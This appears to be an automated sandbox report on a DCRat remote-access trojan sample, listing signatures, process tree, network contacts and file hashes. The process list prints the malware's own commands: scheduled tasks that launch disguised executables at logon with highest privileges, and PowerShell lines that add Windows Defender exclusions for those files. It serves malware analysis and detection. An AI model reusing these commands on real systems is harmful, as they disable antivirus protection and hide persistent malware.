Analysis Overview
SHA256
fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b
Threat Level: Known bad
The file JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b was found to be: Known bad.
Malicious Activity Summary
DCRat payload
Dcrat family
Process spawned unexpected child process
DcRat
DCRat payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-30 02:47
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-30 02:47
Reported
2024-12-30 02:50
Platform
win10v2004-20241007-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\providercommon\DllCommonsvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VideoLAN\VLC\skins\fonts\e6c9b481da804f | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\Assets\dwm.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\SearchApp.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\38384e6a620884 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\providercommon\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\providercommon\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\providercommon\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\SearchApp.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dllhost.exe'
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BDITavvsiM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uOEGMIRuqZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fcYyv3mAUp.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cV1vwDPsky.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\B4BP5ZSgoJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pCY6B1XXru.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LnIbptgF5R.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\61cJPf1Vjg.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nGW3UwTeX7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gTQuRhIyam.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\19YD2Vui68.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe
"C:\Program Files\VideoLAN\VLC\skins\fonts\OfficeClickToRun.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TdlfhXh7Yo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
Files
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
| MD5 | 8088241160261560a02c84025d107592 |
| SHA1 | 083121f7027557570994c9fc211df61730455bb5 |
| SHA256 | 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1 |
| SHA512 | 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478 |
C:\providercommon\1zu9dW.bat
| MD5 | 6783c3ee07c7d151ceac57f1f9c8bed7 |
| SHA1 | 17468f98f95bf504cc1f83c49e49a78526b3ea03 |
| SHA256 | 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322 |
| SHA512 | c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8 |
C:\providercommon\DllCommonsvc.exe
| MD5 | bd31e94b4143c4ce49c17d3af46bcad0 |
| SHA1 | f8c51ff3ff909531d9469d4ba1bbabae101853ff |
| SHA256 | b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63 |
| SHA512 | f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394 |
memory/2828-12-0x00007FFCC7193000-0x00007FFCC7195000-memory.dmp
memory/2828-13-0x0000000000670000-0x0000000000780000-memory.dmp
memory/2828-14-0x000000001B1E0000-0x000000001B1F2000-memory.dmp
memory/2828-15-0x000000001BAC0000-0x000000001BACC000-memory.dmp
memory/2828-16-0x000000001B1F0000-0x000000001B1FC000-memory.dmp
memory/2828-17-0x000000001BAB0000-0x000000001BABC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfuvp51u.gxh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3844-49-0x000002311DA30000-0x000002311DA52000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
